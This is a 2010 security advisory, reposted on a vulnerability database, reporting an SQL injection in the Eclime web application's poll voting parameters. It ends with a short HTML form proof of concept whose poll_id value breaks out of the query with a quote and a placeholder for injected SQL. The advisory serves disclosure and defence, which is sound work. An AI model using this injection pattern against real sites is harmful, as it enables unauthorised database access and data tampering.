Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25216
HistoryDec 01, 2010 - 12:00 a.m.

SQL Injection in Eclime

2010-12-0100:00:00
vulners.com
14

Vulnerability ID: HTB22707
Reference: http://www.htbridge.ch/advisory/sql_injection_in_eclime_2.html
Product: Eclime
Vendor: www.eclime.com ( http://www.eclime.com/ )
Vulnerable Version: 1.1.2b
Vendor Notification: 16 November 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in poll_id & poll_options_id variables.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/index.php?poll_action=vote" method="post">
<input name="poll_options_id" value="1" type="hidden">
<input name="poll_id" type="hidden" value="1'SQL_CODE_HERE" >
<input type="submit" value="submit" name="submit" />
</form>